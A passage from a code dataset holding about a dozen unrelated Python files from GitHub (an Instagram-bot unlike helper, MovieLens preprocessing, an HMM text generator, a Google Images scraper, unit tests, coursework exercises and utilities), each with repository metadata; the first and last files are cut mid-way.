either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param Y_metadata: additional data associated with Y which may be needed\n # :type Y_metadata: dict\n # :param data_symbol: symbol as used matplotlib, by default this is a black cross ('kx')\n # :type data_symbol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) alongside marker type, as is standard in matplotlib.\n # \"\"\"\n # assert \"matplotlib\" in sys.modules, \"matplotlib package has not been imported.\"\n # from GPy.plotting.matplot_dep import models_plots\n # kw = {}\n # if linecol is not None:\n # kw['linecol'] = linecol\n # if fillcol is not None:\n # kw['fillcol'] = fillcol\n # return models_plots.plot_fit(self, plot_limits, which_data_rows,\n # which_data_ycols, fixed_inputs,\n # levels, samples, fignum, ax, resolution,\n # plot_raw=plot_raw, Y_metadata=Y_metadata,\n # data_symbol=data_symbol, **kw)\n","repo_name":"SheffieldML/ChainedGP","sub_path":"chained_gp/svgp_multi.py","file_name":"svgp_multi.py","file_ext":"py","file_size_in_byte":19273,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"16760205043","text":"from tqdm import tqdm\n\nfrom . import limits\nfrom . import delay\n\n\ndef unlike(self, media_id):\n if limits.check_if_bot_can_unlike(self):\n delay.unlike_delay(self)\n if super(self.__class__, self).unlike(media_id):\n self.total_unliked += 1\n return True\n else:\n self.logger.info(\"Out of unlikes for today.\")\n return False\n\n\ndef unlike_medias(self, medias):\n broken_items = []\n self.logger.info(\"Going to unlike %d medias.\" % (len(medias)))\n for media in tqdm(medias):\n if not self.unlike(media):\n delay.error_delay(self)\n broken_items = medias[medias.index(media):]\n break\n self.logger.info(\"DONE: Total unliked %d medias.\" % self.total_unliked)\n return broken_items\n\n\ndef unlike_user(self, user_id):\n self.logger.info(\"Going to unlike user %s's feed:\" % user_id)\n user_id = self.convert_to_user_id(user_id)\n medias = self.get_user_medias(user_id, filtration=False)\n return self.unlike_medias(medias)\n","repo_name":"4rshdeep/inspirata","sub_path":"instabot/instabot/bot/bot_unlike.py","file_name":"bot_unlike.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"11996419610","text":"from sklearn.base import BaseEstimator\nfrom sklearn.base import TransformerMixin\n\n\nclass ColumnSelector(TransformerMixin, BaseEstimator):\n def __init__(self, index=slice(None)):\n self.index = index\n self.n_features = None\n\n def fit(self, x, y=None):\n if len(x.shape) == 2:\n _, self.n_features = x.shape\n else:\n self.n_features = x.shape[0]\n return self\n\n def transform(self, x, y=None):\n xnew = x[..., self.index]\n if len(xnew.shape) == 2:\n return xnew\n else:\n return xnew.reshape(-1, 1)\n\n def get_feature_names(self, input_features=None):\n input_features = input_features or [\"x_{}\".format(i) for i in range(self.n_features)]\n if self.index == slice(None):\n return input_features\n else:\n return [n for i, n in zip(self.index, input_features) if i]\n","repo_name":"Ohjeah/sparsereg","sub_path":"sparsereg/util/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"54"} +{"seq_id":"21334418297","text":"from __future__ import absolute_import\n\nimport mock\nfrom six.moves import StringIO\n\nimport koji\nfrom koji_cli.commands import anon_handle_list_tag_inheritance\nfrom . import utils\n\n\nclass TestListTagInheritance(utils.CliTestCase):\n def setUp(self):\n self.options = mock.MagicMock()\n self.options.debug = False\n self.session = mock.MagicMock()\n self.session.getAPIVersion.return_value = koji.API_VERSION\n self.tag = 'test-tag'\n\n @mock.patch('sys.stderr', new_callable=StringIO)\n def test_without_option(self, stderr):\n expected = \"Usage: %s list-tag-inheritance [options] <tag>\\n\\n\" \\\n \"Prints tag inheritance with basic information about links.\\n\" \\\n \"Four flags could be seen in the output:\\n\" \\\n \" M - maxdepth - limits inheritance to n-levels\\n\" \\\n \" F - package filter (packages ignored for inheritance)\\n\" \\\n \" I - intransitive link - inheritance immediately stops here\\n\" \\\n \" N - noconfig - if tag is used in buildroot, its configuration values \" \\\n \"will not be used\\n\\n\" \\\n \"Exact values for maxdepth and package filter can be inquired by \" \\\n \"taginfo command.\\n\\n\" \\\n \"(Specify the --help global option for a list of other help options)\\n\\n\" \\\n \"%s: error: This command takes exactly one argument: \" \\\n \"a tag name or ID\\n\" % (self.progname, self.progname)\n with self.assertRaises(SystemExit) as ex:\n anon_handle_list_tag_inheritance(self.options, self.session, [])\n self.assertExitCode(ex, 2)\n self.assert_console_message(stderr, expected)\n\n @mock.patch('sys.stderr', new_callable=StringIO)\n def test_with_non_exist_tag(self, stderr):\n expected = \"Usage: %s list-tag-inheritance [options] <tag>\\n\\n\" \\\n \"Prints tag inheritance with basic information about links.\\n\" \\\n \"Four flags could be seen in the output:\\n\" \\\n \" M - maxdepth - limits inheritance to n-levels\\n\" \\\n \" F - package filter (packages ignored for inheritance)\\n\" \\\n \" I - intransitive link - inheritance immediately stops here\\n\" \\\n \" N - noconfig - if tag is used in buildroot, its configuration values \" \\\n \"will not be used\\n\\n\" \\\n \"Exact values for maxdepth and package filter can be inquired by \" \\\n \"taginfo command.\\n\\n\" \\\n \"(Specify the --help global option for a list of other help options)\\n\\n\" \\\n \"%s: error: No such tag: %s\\n\" % (self.progname, self.progname, self.tag)\n self.session.getTag.return_value = None\n with self.assertRaises(SystemExit) as ex:\n anon_handle_list_tag_inheritance(self.options, self.session, [self.tag])\n self.assertExitCode(ex, 2)\n self.assert_console_message(stderr, expected)\n\n def test_help(self):\n self.assert_help(\n anon_handle_list_tag_inheritance,\n \"\"\"Usage: %s list-tag-inheritance [options] <tag>\n\nPrints tag inheritance with basic information about links.\nFour flags could be seen in the output:\n M - maxdepth - limits inheritance to n-levels\n F - package filter (packages ignored for inheritance)\n I - intransitive link - inheritance immediately stops here\n N - noconfig - if tag is used in buildroot, its configuration values will not be used\n\nExact values for maxdepth and package filter can be inquired by taginfo command.\n\n(Specify the --help global option for a list of other help options)\n\nOptions:\n -h, --help show this help message and exit\n --reverse Process tag's children instead of its parents\n --event=EVENT# query at event\n --ts=TIMESTAMP query at last event before timestamp\n --repo=REPO# query at event for a repo\n\"\"\" % self.progname)\n","repo_name":"yifengyou/koji","sub_path":"BUILD/koji-1.30.0-tests/test_cli/test_list_tag_inheritance.py","file_name":"test_list_tag_inheritance.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"22692967763","text":"import numpy as np\nimport pandas as pd\nimport nltk\nimport hmmlearn.hmm as hmm\nfrom time import time\nfrom tqdm import tqdm\nfrom hmmModel import getDataFrame, getPOSMapping, getWordObs, MyHMM\n\nif __name__ == \"__main__\":\n # Load in the Data\n train_corpus = nltk.corpus.brown.tagged_sents(tagset='universal')[:16000]\n val_corpus = nltk.corpus.brown.tagged_sents(tagset='universal')[16000:18000]\n test_corpus = nltk.corpus.brown.tagged_sents(tagset='universal')[18000:20000]\n\n # Convert the Data to a DataFrame\n df_train = getDataFrame(train_corpus)\n df_val = getDataFrame(val_corpus)\n df_test = getDataFrame(test_corpus)\n\n # Set some variables\n np.random.seed(42)\n n_states = 12\n sentNum = 0\n\n # Concatenate sentences together\n trainingObservations = df_train.Word.iloc[0]\n for i, sentList in enumerate(df_train.Word):\n if i == 0:\n continue\n trainingObservations.extend(sentList)\n\n # Train the HMM Model on one sentence\n train_POSMap = getPOSMapping()\n sentObs = getWordObs(trainingObservations)\n\n # Take 20 Samples from the model\n start_time = time()\n myHmm = MyHMM(train_corpus, train_POSMap)\n\n # Get B from File\n isBSaved = False # True to load the B Matrix from a file\n if isBSaved:\n myHmm.loadBFromFile(\"out/BMatrix.npy\", sentObs)\n else:\n myHmm.loadB(sentObs)\n\n # Print the time it takes to generate the B matrix for this model\n print(time() - start_time)\n\n # Generate a large number of sentences with lengths between 6 and 20\n # Save the file as generatedCorpus.csv in the out folder\n numGeneratedSentences = 20000\n myHmm.generateCorpus(numGeneratedSentences , 6, 20, \"generatedCorpus.csv\", True)\n","repo_name":"sggupte/pos-tagging","sub_path":"Generative/textGenerator.py","file_name":"textGenerator.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73686164642","text":"import pandas as pd \r\nimport numpy as np\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nos.chdir('C:/Kaige_Research/Code/graph_bandit/data_process_code/')\r\ninput_path='../original_data/movielens-20m-dataset/'\r\noutput_path='../original_data/movielens-20m-dataset/processed_data/'\r\nprint(os.listdir(input_path))\r\n\r\ndef remove(sentence):\r\n\ta=sentence.split(' ')\r\n\tb=[]\r\n\tfor i in a:\r\n\t\tb.extend(i.split('|'))\r\n\tc=[]\r\n\tfor i in b:\r\n\t\tc.extend(i.split('('))\r\n\r\n\td=[]\r\n\tfor i in c:\r\n\t\td.extend(i.split(')'))\r\n\treturn d\r\n\r\n\r\nmovie=pd.read_csv(input_path+'movie.csv')\r\nmovie.columns\r\nmovie=movie.loc[:,['movieId', 'title']]\r\nmovie.head(10)\r\n\r\nmovie_id=movie['movieId'].values\r\nmovie_title=movie['title'].values\r\n\r\nnp.save(output_path+'movie_id', movie_id)\r\nnp.save(output_path+'movie_title', movie_title)\r\n\r\nuser_id=[]\r\nuser_movie_id=[]\r\nuser_rating=[]\r\n\r\nchunksize = 10**5\r\nfor chunk in pd.read_csv(input_path+'rating.csv', chunksize=chunksize):\r\n\tuser_id.extend(list(chunk['userId'].values))\r\n\tuser_movie_id.extend(list(chunk['movieId'].values))\r\n\tuser_rating.extend(list(chunk['rating'].values))\r\n\r\nnp.save(output_path+'user_id', user_id)\r\nnp.save(output_path+'user_movie_id', user_movie_id)\r\nnp.save(output_path+'user_rating', user_rating)\r\n\r\nunique_user_id=[]\r\nsize=100000\r\nnumber=int(len(user_id)/size)+1\r\nfor i in range(number):\r\n\tprint(i, number)\r\n\tunique_user_id.extend(list(np.unique(user_id[i*size:(i+1)*size])))\r\n\r\nunique_user_id=np.unique(unique_user_id)\r\nnp.save(output_path+'unique_user_id', unique_user_id)\r\n\r\n\r\nuser_num=len(unique_user_id)\r\nuser_movie_dict={}\r\nuser_rating_dict={}\r\n\r\nfor user in unique_user_id:\r\n\tprint(user, user_num)\r\n\tuser_movie_dict[user]=[]\r\n\tuser_rating_dict[user]=[]\r\n\r\n\r\nfor i in range(int(len(user_id)/100)):\r\n\tprint(i)\r\n\tuser=user_id[i]\r\n\tm=user_movie_id[i]\r\n\tr=user_rating[i]\r\n\tuser_movie_dict[user].extend([m])\r\n\tuser_rating_dict[user].extend([r])\r\n\r\n\r\nnp.save(output_path+\"user_movie_dict.npy\", user_movie_dict)\r\nnp.save(output_path+\"user_rating_dict.npy\", user_rating_dict)\r\n\r\n\t\r\nuser_freq_dict={}\r\nfor user in unique_user_id:\r\n\tprint(user, user_num)\r\n\tuser_freq_dict[user]=[]\r\n\r\nfreq_list=np.zeros(len(user_movie_dict.keys()))\r\nfor user in user_movie_dict.keys():\r\n\tprint(user)\r\n\tuser_freq_dict[user]=len(user_movie_dict[user])\r\n\tfreq_list[user-1]=len(user_movie_dict[user])\r\n\r\nnp.save(output_path+\"user_freq_dict.npy\", user_freq_dict)\r\nnp.save(output_path+\"freq_list.npy\", freq_list)\r\n\r\nlen(freq_list[freq_list>100])\r\n\r\ntop_500_user_id=list(np.where(freq_list>=100)[0])\r\ntop_500_user_freq=freq_list[freq_list>=100]\r\nnp.save(output_path+'top_500_user_id', top_500_user_id)\r\nnp.save(output_path+'top_500_user_freq', top_500_user_freq)\r\n\r\n\r\ntop_500_user_film=[]\r\nfor user in top_500_user_id:\r\n\tfilms=user_movie_dict[user]\r\n\ttop_500_user_film.extend(films)\r\n\r\ntop_500_user_film=np.unique(top_500_user_film)\r\nnp.save(output_path+'top_500_user_film_id', top_500_user_film)\r\n\r\nmovie=pd.read_csv(input_path+'movie.csv')\r\nmovie.columns\r\nmovie_id=movie['movieId'].values\r\ngenres=movie['genres'].values\r\nmovie_title=movie['title'].values\r\n\r\ntag=pd.read_csv(input_path+'tag.csv')\r\ntag.columns\r\ntags=tag['tag'].values\r\ntag_movie_id=tag['movieId'].values\r\n\r\nmovie_describe_dict={}\r\nfor m in movie_id:\r\n\tprint(m)\r\n\tmovie_describe_dict[m]=[]\r\n\r\nfor index in range(len(tag_movie_id)):\r\n\tprint(index)\r\n\tm=tag_movie_id[index]\r\n\ttry:\r\n\t\ttag=tags[index]\r\n\t\tmovie_describe_dict[m]+=[tag]\r\n\texcept:\r\n\t\tpass\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\tge=genres[index]\r\n\t\tmovie_describe_dict[m]+=[ge]\r\n\texcept:\r\n\t\tpass\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\ttitle=movie_title[index]\r\n\t\tmovie_describe_dict[m]+=[title]\r\n\texcept:\r\n\t\tpass\r\n\r\nnp.save(output_path+'movie_describe_dict.npy', movie_describe_dict)\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\ta=''\r\n\t\tfor word in movie_describe_dict[m]:\r\n\t\t\ta+=str(word)+' '\r\n\t\tmovie_describe_dict[m]=a\r\n\texcept:\r\n\t\tpass\r\n\r\nimport nltk \r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nstop_words=set(stopwords.words('english'))\r\nps=PorterStemmer()\r\n\r\nnew_movie_describe_dict={}\r\nfor m in movie_describe_dict.keys():\r\n\ttry:\r\n\t\tprint(m)\r\n\t\tnew_movie_describe_dict[m]=remove(movie_describe_dict[m])\r\n\t\tfiltered_stemm_sent=[]\r\n\t\tfor w in new_movie_describe_dict[m]:\r\n\t\t\tif w not in stop_words:\r\n\t\t\t\tfiltered_stemm_sent.append(ps.stem(w))\r\n\t\tnew_movie_describe_dict[m]=filtered_stemm_sent\r\n\texcept:\r\n\t\tpass\r\n\r\nnp.save(output_path+\"new_movie_describe_dict.npy\", new_movie_describe_dict)\t\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\ta=''\r\n\t\tfor word in new_movie_describe_dict[m]:\r\n\t\t\ta+=str(word)+' '\r\n\t\tnew_movie_describe_dict[m]=a\r\n\texcept:\r\n\t\tpass\r\n\r\nnp.save(output_path+\"new_movie_describe_dict2.npy\", new_movie_describe_dict)\t\r\n\r\nnew_movie_describe_dict=np.load(output_path+'new_movie_describe_dict2.npy')\r\nnew_movie_describe_dict=new_movie_describe_dict.item()\r\n\r\nfor m in movie_id:\r\n\tprint('movie_id/movie_num', m, len(movie_id))\r\n\tprint('describe', new_movie_describe_dict[m])\r\n\r\nsentence_long_list=[]\r\nfor m in movie_id:\r\n\tsentence_long_list.append(new_movie_describe_dict[m])\r\n\r\nnp.save(output_path+'movie_describe_list.npy',sentence_long_list)\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nvec = TfidfVectorizer(ngram_range=(1, 2), max_df=0.8, min_df=0.05)\r\nX = vec.fit_transform(sentence_long_list)\r\nX_dense = X.todense()\r\nprint (X_dense[0,:])\r\nprint(X_dense.shape)\r\n\r\ndf_movie_describe=pd.DataFrame(columns=['movieId']+['f_%s'%(s+1) for s in range(X_dense.shape[1])])\r\ndf_movie_describe['movieId']=movie_id\r\ndf_movie_describe[['f_%s'%(s+1) for s in range(X_dense.shape[1])]]=X_dense\r\n\r\ndf_movie_describe.to_csv(output_path+'df_movie_describe_numeric')\r\n\r\nfrom sklearn.decomposition import PCA\r\npca=PCA(n_components=10)\r\nx=pca.fit_transform(X_dense)\r\n\r\ndf_movie_describe_small=pd.DataFrame(columns=['movieId']+['f_%s'%(s+1) for s in range(x.shape[1])])\r\ndf_movie_describe_small['movieId']=movie_id\r\ndf_movie_describe_small[['f_%s'%(s+1) for s in range(x.shape[1])]]=x\r\n\r\ndf_movie_describe_small.to_csv(output_path+'df_movie_describe_numeric_small')\r\n\r\n","repo_name":"yang0110/graph-based-bandit","sub_path":"movilens_data_process.py","file_name":"movilens_data_process.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"71003080163","text":"import asyncio\nimport os\n\ncurrent_dir = os.getcwd()+\"/zadatak-1\"\n\nasync def afun1(list_names):\n await asyncio.sleep(0.2)\n return [{\"naziv\": name, \"velicina\": os.path.getsize(name)} for name in list_names]\n\n\ndef fun2(list_names):\n for x in list_names:\n f = open(x, 'w')\n for i in range(1, 10001):\n f.write(str(i)+'\\t')\n\n\nasync def main():\n list_names = []\n for i in range(3):\n open(\"datoteka{}\".format(i+1), \"w\")\n list_names.append(\"datoteka{}\".format(i+1))\n fun2(list_names)\n result = await afun1(list_names)\n print(result)\n\nif __name__ == \"__main__\":\n asyncio.run(main())","repo_name":"LoncaricLaura/distsys-zadace","sub_path":"03-zadaci/zadatak-1/zadatak-1.py","file_name":"zadatak-1.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18539901033","text":"'''\n4.7 (Financial application: monetary units) Modify Listing 3.4, ComputeChange.py,\nto display the nonzero denominations only, using singular words for single units\nsuch as 1 dollar and 1 penny, and plural words for more than one unit such as 2\ndollars and 3 pennies.\n\n'''\n\n# Recieve the amount\namount = eval(input(\"Enter an amount, for example 11.56:\"))\n\n# Convert the amount to cents\nremaining_amount = int(amount * 100)\n\n# Find the number of dollars\nnumber_of_one_dollars = remaining_amount // 100\nremaining_amount = remaining_amount % 100\n\n#Find the numnber of quaters in the remaining amount\nnumber_of_quaters = remaining_amount // 25\nremaining_amount = remaining_amount % 25\n\n#find the number of dimes in the remaining amount\nnumber_of_dimes = remaining_amount // 10\nremaining_amount = remaining_amount % 10\n\n#find the number of nickels in the remaining amount\nnumber_of_nickels = remaining_amount // 5\nremaining_amount = remaining_amount % 5\n\n#find the number of pennies in the remaining amount\nnumber_of_pennies = remaining_amount\n\n#displaying result\nprint(f\"Your Amount {amount} Consists of:\\n\")\n\nif number_of_one_dollars != 0:\n if number_of_one_dollars > 1:\n print(f\"\\t {number_of_one_dollars} Dollars\\n\")\n else:\n print(f\"\\t {number_of_one_dollars} Dollar\\n\")\nif number_of_quaters != 0:\n if number_of_quaters > 1:\n print(f\"\\t {number_of_quaters} Quaters\\n\")\n else:\n print(f\"\\t {number_of_quaters} Quater\\n\")\nif number_of_dimes != 0:\n if number_of_dimes > 1:\n print(f\"\\t {number_of_dimes} Dimes\\n\")\n else:\n print(f\"\\t {number_of_dimes} Dime\\n\")\nif number_of_nickels != 0:\n if number_of_nickels > 1:\n print(f\"\\t {number_of_nickels} Nickels\\n\")\n else:\n print(f\"\\t {number_of_nickels} Nickel\\n\")\nif number_of_pennies != 0:\n if number_of_pennies > 1:\n print(f\"\\t {number_of_pennies} Pennies\\n\")\n else:\n print(f\"\\t {number_of_pennies} Penny\\n\")","repo_name":"musawakiliML/Python-Exercises","sub_path":"Introduction to Programming using Python/Chapter 4/Ex4.7.py","file_name":"Ex4.7.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27896673361","text":"#%% \nimport logging\nfrom dataclasses import dataclass\nfrom tkinter import Tk\nfrom tkinter.filedialog import askopenfilename\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom npp_materialslab_tools import TensileData\nfrom npp_materialslab_tools.plottools import Cursor\n\n# DEVELOPMENT_FLAG = True\n# DEVELOPMENT_FNAME = \"testingMachine/data/new XY 0 ABS_CNT 2%.csv\" \n\n# if DEVELOPMENT_FLAG:\n# logging.basicConfig(level=logging.DEBUG)\n# else:\n# logging.basicConfig(level=logging.ERROR)\nclass PointsSelector2():\n def __init__(self, fig, ax):\n\n self.fig = fig\n self.ax = ax\n self.fig.canvas.mpl_connect('button_press_event', self.mouse_click)\n\n self.reset_SM()\n \n def reset_SM(self):\n ''' resets state machine status'''\n self._points_collected = {}\n self._sm = 0\n # self.txt.set_text('')\n\n # self.ax.cla()\n\n def _calc_x_y_ind(self, x_event, y_event ):\n ''' calculates the x, y and index from the event data\n\n It does that by finding the closest point.\n\n Callers: mouse_click\n '''\n try:\n line = self.ax.lines[0]\n self.xdata = line.get_xdata()\n self._F_Ns = line.get_ydata()\n indx = min(np.searchsorted(self.xdata, x_event), len(self.xdata) - 1)\n x = self.xdata[indx]\n y = self._F_Ns[indx]\n return x, y, indx \n except:\n return \n\n def mouse_click(self, event):\n ''' change the state machine on each click\n ''' \n if not event.inaxes:\n ''' only continue when a point is picked'''\n return\n\n # update state machine\n if self._sm == 0:\n crsrID = self._sm+1\n x,y, indx = self._calc_x_y_ind(event.xdata, event.ydata)\n # update the line positions\n self._points_collected[crsrID] = Cursor(self.ax, crsrID, x, y, indx)\n self._points_collected[crsrID].plot_cursor()\n self._sm = 1\n elif self._sm == 1:\n crsrID = self._sm+1\n x,y, indx = self._calc_x_y_ind(event.xdata, event.ydata)\n # update the line positions\n self._points_collected[crsrID] = Cursor(self.ax, crsrID, x, y, indx)\n self._points_collected[crsrID].plot_cursor()\n \n self._sm = 2 \n if self._sm ==2:\n logging.debug (\"ready to plot\")\n # self.computations()\n pass\n else:\n print (\"State status: {} | x={:1.2f}, y={:1.2f}\".format(self._sm,x,y))\n self.ax.figure.canvas.draw()\n","repo_name":"npapnet/hmu.materialslab.tools","sub_path":"pypkg/npp_materialslab_tools/plottools/point_selector2.py","file_name":"point_selector2.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42842800118","text":"import os\nfrom .base import *\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'django_db', # Or path to database file if using sqlite3.\n 'USER': 'django_login', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': 'LOCALHOST', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\nSTATIC_ROOT = PROJECT_DIR\n\n\nSECRET_KEY = os.environ[\"SECRET_KEY\"]\n\nINSTALLED_APPS += (\"debug_toolbar\",)\nINTERNAL_IPS = (\"127.0.0.1\",)\nMIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)\n\nALLOWED_HOSTS = []\n","repo_name":"parlarjb/toy_blog","sub_path":"toy_blog/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15830379643","text":"import os\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndata_folder = 'C:/Users/админ/PycharmProjects/PDS2/PDS2_Kofanov/My_project/dataset_parser'\n\n\n\nfruit_n_vegetables_eng = ['avocado', 'orange', 'banana', 'beets', 'grapes', 'grapefruit',\n 'cabbage', 'potatoes', 'kiwi', 'lemon', 'carrot', 'cucumber', 'bell pepper',\n 'champignon', 'tomato', 'green onion', 'onion', 'garlic', 'apples', 'ginger']\n\nfruit_n_vegetables_fr = ['avocat', 'orange', 'banane', 'betterave', 'raisin', 'pamplemousse',\n 'chou', 'pomme de terre', 'kiwi', 'citron', 'carotte', 'concombre', 'poivron',\n 'champignon', 'tomate', 'oignon vert', 'oignon', 'ail', 'pomme', 'gingembre']\n\nfruit_n_vegetables_sp = ['aguacate', 'naranja', 'plátano', 'remolacha', 'uva', 'pomelo',\n 'repollo', 'papa', 'kiwi', 'limón', 'zanahoria', 'pepino', 'pimiento morrón',\n 'hongo', 'tomate', 'cebolla verde', 'cebolla', 'ajo', 'manzana', 'jengibre']\n\nfruit_n_vegetables_shv = ['avokado', 'apelsin', 'banan', 'rödbetor', 'grape', 'grapefrukt',\n 'kål', 'potatis', 'kiwi', 'citron', 'morot', 'gurka', 'peppar',\n 'svamp', 'tomat', 'grön lök', 'lök', 'vitlök', 'äpple', 'ingfära']\n\nfruit_n_vegetables_de = ['Avocado', 'Orange', 'Banane', 'Rüben', 'Trauben', 'Grapefruit',\n 'Kohl', 'Kartoffeln', 'Kiwi', 'Zitrone', 'Karotte', 'Gurke', 'Paprika',\n 'Champignon', 'Tomate', 'Frühlingszwiebel', 'Zwiebel', 'Knoblauch', 'Äpfel', 'Ingwer']\n\nfruit_n_vegetables_it = ['avocado', 'arancia', 'banana', 'barbabietola', 'uva', 'pompelmo', 'cavolo',\n 'patate', 'kiwi', 'limone', 'carota', 'cetriolo', 'peperone', 'champignon',\n 'pomodoro', 'cipolla verde', 'cipolla', 'aglio', 'mele', 'zenzero']\n\nfruit_n_vegetables_tr = ['avokado', 'portakal', 'muz', 'pancar', 'üzüm', 'greyfurt',\n 'lahana', 'patates', 'kivi', 'limon', 'havuç', 'salatalık', 'biber',\n \"mantar\", \"domates\", \"yeşil soğan\", \"soğan\", \"sarımsak\", \"elma\", \"zencefil\"]\n\nfruit_n_vegetables_gr = ['αβοκάντο', 'πορτοκάλι', 'μπανάνα', 'παντζάρια', 'σταφύλι', 'γκρέιπφρουτ',\n 'λάχανο', 'πατάτα', 'ακτινίδιο', 'λεμόνι', 'καρότο', 'αγγούρι', 'πιπεριά',\n 'μανιτάρι', 'ντομάτα', 'πράσινο κρεμμύδι', 'κρεμμύδι', 'σκόρδο', 'μήλο', 'τζίντζερ']\n\nfruit_n_vegetables_uk = ['авокадо', 'апельсин', 'банан', 'буряк', 'виноград', 'грейпфрут',\n 'капуста', 'картопля', 'ківі', 'лимон', 'морква', 'огірок', 'перець болгарський',\n 'печериця', 'помідор', 'цибуля зелена', 'цибуля', 'часник', 'яблука', 'імбир']\n\n\n\n\nlibrary_list = [fruit_n_vegetables_eng, fruit_n_vegetables_fr, fruit_n_vegetables_sp, fruit_n_vegetables_shv,\n fruit_n_vegetables_de, fruit_n_vegetables_it, fruit_n_vegetables_tr, fruit_n_vegetables_gr,\n fruit_n_vegetables_uk]\n\ndef scrape_images(query, num_images, save_dir, num_lib):\n query = query.split()\n query = '+'.join(query)\n url = \"https://www.google.co.in/search?q=\"+query+\"&source=lnms&tbm=isch\"\n header = {'User-Agent': 'Mozilla/5.0'}\n soup = BeautifulSoup(requests.get(url, headers=header).content, 'html.parser')\n images = [a['src'] for a in soup.find_all(\"img\", {\"src\": True})]\n images = images[1:num_images+1]\n for i, image in enumerate(images):\n try:\n print(f\"{num_lib}.{query}.{i+1}\")\n filename = f\"{query}_{num_lib}_{i+1}.jpg\"\n filepath = os.path.join(save_dir, filename)\n urllib.request.urlretrieve(image, filepath)\n except:\n continue\n\n\nif not os.path.exists(data_folder):\n os.makedirs(data_folder)\n for folders in fruit_n_vegetables_eng:\n os.makedirs(os.path.join(data_folder, folders))\n\nnum_library = 0\nfor library in library_list:\n num_library += 1\n for n in range(len(library)):\n path_to_folder = os.path.join(data_folder, fruit_n_vegetables_eng[n])\n scrape_images(library[n], 100, path_to_folder, num_library)\n\n\n\n\n","repo_name":"KofanovE/PDS2_Kofanov","sub_path":"My_project/parser_images.py","file_name":"parser_images.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37781024560","text":"from functools import wraps\nfrom typing import List, Tuple\n\nimport numpy as np\n\nfrom mathutils import Matrix\n\nfrom sverchok.data_structure import fixed_iter, levels_of_list_or_np, numpy_full_list\n\nSvVerts = List[Tuple[float, float, float]]\nSvEdges = List[Tuple[int, int]]\nSvPolys = List[List[int]]\n\n\ndef match_sockets(*sockets_data):\n \"\"\"\n data1 = [[1,2,3]]\n data2 = [[4,5], [6,7]]\n data3 = [[8]]\n for d1, d2, d3 in match_sockets(data1, data2, data3):\n print(f\"{d1=}, {d2=}, {d3=}\")\n # print(1) d1=[1,2,3], d2=[4,5,5], d3=[8]\n # print(2) d2=[1,2,3], d2=[6,7,7], d3=[8]\n \"\"\"\n obj_len = max(len(data) for data in sockets_data) if sockets_data else 0\n sockets_data = [fixed_iter(d, obj_len) for d in sockets_data]\n for objects in zip(*sockets_data):\n data_len = max(len(d) for d in objects)\n layer_data = []\n for data in objects:\n if len(data) != data_len and len(data) > 1:\n if isinstance(data, np.ndarray):\n data = numpy_full_list(data, data_len)\n else: # Python list?\n data = list(fixed_iter(data, data_len))\n layer_data.append(data)\n yield layer_data\n\n\ndef vectorize(func=None, *, match_mode=\"REPEAT\"):\n \"\"\"\n If there is function which takes some values\n with this decorator it's possible to call the function by passing list of values of any shape\n Take care of properly annotating of decorated function\n Use Tuple[] in return annotation only if you want the decorator splits the return values into different lists\n\n ++ Example ++\n\n from sverchok.utils import vectorize\n\n def main_node_logic(*, prop_a: List[float], prop_b: Matrix, mode_a: str) -> Tuple[list, list]:\n ...\n return data1, data2\n\n class MyNode:\n ...\n def process(self):\n input_a = self.inputs[0].sv_get(default=None)\n input_b = self.inputs[1].sv_get(default=None)\n\n main_node_logic = vectorize(main_node_logic, match_mode=self.match_mode)\n out1, out2 = main_node_logic(input_a, input_b, mode_a = self.mode_a)\n\n 